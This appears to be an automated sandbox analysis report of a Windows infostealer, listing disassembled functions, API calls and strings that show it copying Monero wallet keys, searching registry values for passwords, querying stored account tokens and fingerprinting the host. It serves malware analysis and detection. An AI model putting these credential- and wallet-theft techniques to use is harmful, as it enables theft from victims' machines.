Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003D8B60: GetSystemTime.KERNEL32(003E0E1A,00E6B6C8,003E05AE,?,?,003C13F9,?,0000001A,003E0E1A,00000000,?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003D8B86

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 003C1465

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Part of subcall function 003C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003C99EC
Part of subcall function 003C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003C9A11
Part of subcall function 003C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003C9A31
Part of subcall function 003C99C0: ReadFile.KERNEL32(000000FF,?,00000000,003C148F,00000000), ref: 003C9A5A
Part of subcall function 003C99C0: LocalFree.KERNEL32(003C148F), ref: 003C9A90
Part of subcall function 003C99C0: CloseHandle.KERNEL32(000000FF), ref: 003C9A9A

DeleteFileA.KERNEL32(00000000), ref: 003C14EF

Strings

wallet_path, xrefs: 003C1330
.keys, xrefs: 003C136B
SOFTWARE\monero-project\monero-core, xrefs: 003C1335
\Monero\wallet.keys, xrefs: 003C138D

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: 4f1f301350e285be378b33df9af6c05a05c418fdf38a0d059689796a4f18fc6d
Instruction ID: c1b7632ca7799dc4f04d64f60aafae83db6f6686c6d01209c4ba36780fad7352
Opcode Fuzzy Hash: 4f1f301350e285be378b33df9af6c05a05c418fdf38a0d059689796a4f18fc6d
Instruction Fuzzy Hash: 7A5176B2D5021857CB16FB60ED92FED737CAF54300F404199B60AA6182EF706B85DFA6

Function 003D7500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 003D7542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003D757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D7603
RtlAllocateHeap.NTDLL(00000000), ref: 003D760A
wsprintfA.USER32 ref: 003D7640

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Strings

C, xrefs: 003D754C
\, xrefs: 003D7560
>, xrefs: 003D764D, 003D7655, 003D761B, 003D7623
:, xrefs: 003D755C

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\$>
API String ID: 1544550907-1396938292
Opcode ID: 3ddd0c4eb9e6e08ab222f7cc3679fe721616de435289d762f0c38f4da3c829e4
Instruction ID: 6dc4eea730b7c517fbcd1dac91532b705cd08787dcd9711ea4e96ad4147ee82e
Opcode Fuzzy Hash: 3ddd0c4eb9e6e08ab222f7cc3679fe721616de435289d762f0c38f4da3c829e4
Instruction Fuzzy Hash: 9D41C4B2D44348ABDB11DF94EC45BDEBBB9EF08700F10409AF5096B380E774AA44CBA1

Function 003C75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003C72D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 003C733A
Part of subcall function 003C72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003C73B1
Part of subcall function 003C72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 003C740D
Part of subcall function 003C72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 003C7452
Part of subcall function 003C72D0: HeapFree.KERNEL32(00000000), ref: 003C7459

lstrcat.KERNEL32(2F783020,003E17FC), ref: 003C7606
lstrcat.KERNEL32(2F783020,00000000), ref: 003C7648
lstrcat.KERNEL32(2F783020, : ), ref: 003C765A
lstrcat.KERNEL32(2F783020,00000000), ref: 003C768F
lstrcat.KERNEL32(2F783020,003E1804), ref: 003C76A0
lstrcat.KERNEL32(2F783020,00000000), ref: 003C76D3
lstrcat.KERNEL32(2F783020,003E1808), ref: 003C76ED
task.LIBCPMTD ref: 003C76FB

Strings

: , xrefs: 003C764E

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
String ID: :
API String ID: 2677904052-3653984579
Opcode ID: b0a00576b135f955a184587cdca3858fb257699428cefc7fb50b64efb8c867cc
Instruction ID: 4003083a67b668cd836510a5cf2e29087c1fc43322f045e6b935d135d5cc84eb
Opcode Fuzzy Hash: b0a00576b135f955a184587cdca3858fb257699428cefc7fb50b64efb8c867cc
Instruction Fuzzy Hash: 57314C72A40209EFCB06EBF4DC95EFF77BABB44301B145118F502AB290DA35AE46CB51

Function 003D8100 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00E6EDD8,00000000,?,003E0E2C,00000000,?,00000000), ref: 003D8130
RtlAllocateHeap.NTDLL(00000000), ref: 003D8137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 003D8158
__aulldiv.LIBCMT ref: 003D8172
__aulldiv.LIBCMT ref: 003D8180
wsprintfA.USER32 ref: 003D81AC

Strings

%d MB, xrefs: 003D81A3
@, xrefs: 003D814D
H, xrefs: 003D819B, 003D819E

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@$H
API String ID: 2774356765-371483412
Opcode ID: aac060d00fa2b68f4eb18bd79e25fb1bdd80bccbbb055b969708caf924d3ac51
Instruction ID: 811e9948fc2cd86d7a0c000c9c94f1026f1aa84748016e5644f8b2db6a99e39c
Opcode Fuzzy Hash: aac060d00fa2b68f4eb18bd79e25fb1bdd80bccbbb055b969708caf924d3ac51
Instruction Fuzzy Hash: B321F9B2A44318ABDB00DFD4DC49FAFB7B9FB44B54F104609F605AB280D77869058BA5

Function 003C72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 003C733A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003C73B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 003C740D
GetProcessHeap.KERNEL32(00000000,?), ref: 003C7452
HeapFree.KERNEL32(00000000), ref: 003C7459
task.LIBCPMTD ref: 003C7555

Strings

Password, xrefs: 003C7401

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuetask
String ID: Password
API String ID: 775622407-3434357891
Opcode ID: 540401f113f94788f9a5f8f9478fd326f82b043f3869784f37d96004fac75363
Instruction ID: 3fe675beedd650b04d00cc444e53733a64c5426c1ec68441c932ef76655160e2
Opcode Fuzzy Hash: 540401f113f94788f9a5f8f9478fd326f82b043f3869784f37d96004fac75363
Instruction Fuzzy Hash: 12611BB590426C9BDB25DB50CC55FDAB7B8BF44300F0085E9E689AA141DBB06FC9CFA1

Function 003D7690 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D76A4
RtlAllocateHeap.NTDLL(00000000), ref: 003D76AB
RegOpenKeyExA.KERNEL32(80000002,00E5D2E0,00000000,00020119,00000000), ref: 003D76DD
RegQueryValueExA.KERNEL32(00000000,00E6EC70,00000000,00000000,?,000000FF), ref: 003D76FE
RegCloseKey.ADVAPI32(00000000), ref: 003D7708

Strings

Windows 11, xrefs: 003D76BD
p, xrefs: 003D76F3

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11$p
API String ID: 3225020163-3637393376
Opcode ID: 008c78e7351798d07a5f722620b0be0167a5f4c20e4cc3a9f88def2a63f2578f
Instruction ID: 94884a6c0682aa8cd40d6214f9b5225324033d3120bfc6742678537be97dd430
Opcode Fuzzy Hash: 008c78e7351798d07a5f722620b0be0167a5f4c20e4cc3a9f88def2a63f2578f
Instruction Fuzzy Hash: 8401A2B9A80304BBDB00DBE0ED49F7FB7BDEB08700F008555FA04D7290E67099008B51

Function 003CBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

lstrlen.KERNEL32(00000000), ref: 003CBC9F

Part of subcall function 003D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003D8E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 003CBCCD
lstrlen.KERNEL32(00000000), ref: 003CBDA5
lstrlen.KERNEL32(00000000), ref: 003CBDB9

Strings

SELECT service, encrypted_token FROM token_service, xrefs: 003CBBEB
AccountTokens, xrefs: 003CBB49
AccountTokens, xrefs: 003CBABA
AccountId, xrefs: 003CBCC4

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
